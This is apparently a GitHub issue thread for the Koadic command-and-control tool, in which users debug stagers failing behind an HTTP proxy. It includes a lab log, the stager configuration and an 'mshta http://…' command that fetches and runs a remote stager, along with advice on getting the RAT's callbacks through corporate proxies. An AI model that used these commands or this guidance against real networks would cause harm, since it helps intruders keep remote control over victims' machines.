### ISSUE TITLE
Proxy Awareness Issue

### ISSUE THREAD

**Issue by Zer0-Tolerance** [zerosum0x0/koadic#55]
Hi Guys,

Just did some testing on a simple env with HTTP proxy with no auth and a W10 version 1803 workstation and I can't get any stager to run. They all failed with timeout after the first connection.

It seems to work though when a direct connection to the C2 is possible (maybe an issue with the proxy handling I guess...)

Can you look into this ?

**Comment by TheNaterz** [comment]
Can you post some verbose output? I've got a proxy here in front of me and everything looks OK.

**Comment by Zer0-Tolerance** [comment]
here is the proxy output:
```
[Tue Aug 21 19:45:07 2018] (69486) REQUEST: GET http://192.168.166.11:9999/CPMTt
[Tue Aug 21 19:45:07 2018] (69486) REQUEST: Via: 1.1 MBPro.local:8080 (HTTP::Proxy/0.304)
[Tue Aug 21 19:45:07 2018] (69486) REQUEST: Accept: */*
[Tue Aug 21 19:45:07 2018] (69486) REQUEST: Accept-Encoding: gzip, deflate
[Tue Aug 21 19:45:07 2018] (69486) REQUEST: Accept-Language: en-GB
[Tue Aug 21 19:45:07 2018] (69486) REQUEST: Host: 192.168.166.11:9999
[Tue Aug 21 19:45:07 2018] (69486) REQUEST: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)
[Tue Aug 21 19:45:07 2018] (69486) REQUEST: UA-CPU: AMD64
[Tue Aug 21 19:45:07 2018] (69486) REQUEST: X-Forwarded-For: 192.168.99.100
[Tue Aug 21 19:45:07 2018] (69486) RESPONSE: 200 OK
[Tue Aug 21 19:45:07 2018] (69486) RESPONSE: Date: Tue, 21 Aug 2018 17:45:07 GMT
[Tue Aug 21 19:45:07 2018] (69486) RESPONSE: Transfer-Encoding: chunked
[Tue Aug 21 19:45:07 2018] (69486) RESPONSE: Via: 1.0 MBPro.local:8080 (HTTP::Proxy/0.304)
[Tue Aug 21 19:45:07 2018] (69486) RESPONSE: Server: Apache
```

Here is the conf on the server:
```
(koadic: sta/js/mshta)$ info

	NAME        VALUE               REQ     DESCRIPTION
	-----       ------------        ----    -------------
	SRVHOST     192.168.166.11      yes     Where the stager should call home
	SRVPORT     9999                yes     The port to listen for stagers on
	EXPIRES                         no      MM/DD/YYYY to stop calling home
	KEYPATH                         no      Private key for TLS communications
	CERTPATH                        no      Certificate for TLS communications
	MODULE                          no      Module to run once zombie is staged

(koadic: sta/js/mshta)$ run
[+] Spawned a stager at http://192.168.166.11:9999/CPMTt
[!] Don't edit this URL! (See: 'help portfwd')
[>] mshta http://192.168.166.11:9999/CPMTt
[+] Zombie 0: Staging new connection (192.168.166.11)
[!] Zombie 0: Timed out.

```
W10 workstation is on a host only (192.168.99.100) network and has to use the proxy to reach 192.168.166.0/24

**Comment by Zer0-Tolerance** [comment]
I've tried with Squid as well same result.

**Comment by TheNaterz** [comment]
Alright so I've got some bad news...

Turns out, everything we thought we knew about Msxml2.ServerXMLHTTP.6.0 and proxies was wrong. Our environments were set up to use proxies, but any request made using Msxml2.ServerXMLHTTP.6.0 has to explicitly be set to use a proxy via the setProxy() method. By default, for whatever reason, it's not respecting System proxy settings and also, for whatever reason, when I explicitly tell setProxy() to use the System proxy, it doesn't pull the information correctly (these 2 issues are probably related). I only figured this out when I noticed in Wireshark that requests were coming from 2 different IPs, the proxy and the actual target.

Naturally, I did some more testing. I explicitly set the proxy in setProxy() and a little bit more progress was made, but now mshta.exe is hanging somewhere and I can't figure out why. Also, messing with the setTimeouts() values was required to just get parse_user_info() to work with the proxy. This problem may be larger than we thought and is gonna require a lot more testing and research.

For now.... don't use Koadic through a proxy if you can avoid it.

**Comment by Zer0-Tolerance** [comment]
Thks for the investigation, Indeed sounds very bad proxy support is a must have for any RAT to be used in a corp env.
Let me know when you make some progress. 
FYI I just tried Merlin HTTP/2 as well which seems to have also a proxy support issue or no system proxy support at all for windows

**Comment by TheNaterz** [comment]
#110 
Pretty sure these are linked.

**Comment by TheNaterz** [comment]
Computers are sentient magical forces and they rely on the kindness of technology goblins to function correctly. Please consult your nearest cyber shaman whenever Mars is in retrograde to determine the best course of action on this matter.

Alternatively, switch your fork command from spawning a rundll32 payload to an mshta payload. I reference the specific line in the issue linked above.
